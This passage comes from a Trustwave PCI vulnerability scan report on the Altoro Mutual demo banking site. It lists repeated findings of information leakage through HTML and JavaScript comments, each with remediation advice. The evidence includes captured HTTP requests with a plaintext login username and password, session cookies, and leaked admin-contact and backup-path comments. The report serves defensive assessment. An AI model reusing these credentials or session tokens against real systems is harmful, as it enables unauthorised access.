Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 300 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

43 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/doLogin


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 301 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

44 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 302 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://demo.testfire.net:8443/index.jsp?content=personal.htm
GET - https://demo.testfire.net:8443/index.jsp?content=business.htm
GET - https://demo.testfire.net:8443/subscribe.jsp
POST - https://demo.testfire.net:8443/doSubscribe
GET -
https://demo.testfire.net:8443/default.jsp?content=security.htm
GET - https://demo.testfire.net:8443/survey_questions.jsp
GET - https://demo.testfire.net:8443/survey_questions.jsp?step=a
GET - https://demo.testfire.net:8443/status_check.jsp
GET - https://demo.testfire.net:8443/swagger/index.html

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 303 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

45 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/search.jsp?query=_WSETESTDA


HTML or JavaScript TA
comments Port: tcp/8443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 304 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: GET
https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

46 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/feedback.jsp


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 305 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://65.61.137.117/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

47 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/disclaimer.htm?url=http://www.


microsoft.com

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 306 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

HTML or JavaScript Port: tcp/8080


comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net:8080/disclaimer.htm?url=http://www.microsoft.
com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
http://demo.testfire.net:8080/disclaimer.htm?url=http://www.microsoft.
com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 307 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

48 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/doLogin


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net:8443/doLogin
Potentially sensitive comments found

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 308 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

49 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/index.jsp?content=inside_contact.h


tm

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 309 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

HTML or JavaScript Port: tcp/8080


comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 310 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

50 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/doLogin


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 311 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117:8080/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 312 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

51 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 313 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
savings, accounts -->
Request: GET https://65.61.137.117:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

52 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/disclaimer.htm?url=http://www.mi


HTML or JavaScript crosoft.com
comments Port: tcp/8443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 314 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117:8443/disclaimer.htm?url=http://www.microsoft.c
om
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://65.61.137.117:8443/disclaimer.htm?url=http://www.microsoft.c
om HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

53 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 315 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
An attacker who finds these comments can map the application's
structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://demo.testfire.net/index.jsp?content=personal.htm
GET - https://demo.testfire.net/index.jsp?content=business.htm
GET - https://demo.testfire.net/subscribe.jsp
POST - https://demo.testfire.net/doSubscribe
GET - https://demo.testfire.net/default.jsp?content=security.htm
GET - https://demo.testfire.net/survey_questions.jsp
GET - https://demo.testfire.net/survey_questions.jsp?step=a
GET - https://demo.testfire.net/status_check.jsp
GET - https://demo.testfire.net/swagger/index.html

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

54 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/index.jsp


HTML or JavaScript Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 316 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

comments While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://65.61.137.117/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 317 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

55 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 318 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

56 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/login.jsp


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 319 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: GET http://demo.testfire.net:8080/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 320 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

57 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/disclaimer.htm?url=http://www.n


HTML or JavaScript etscape.com
comments Port: tcp/8080

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net:8080/disclaimer.htm?url=http://www.netscape.
com

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 321 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://demo.testfire.net:8080/disclaimer.htm?url=http://www.netscape.
com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

58 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/sendFeedback


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 322 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

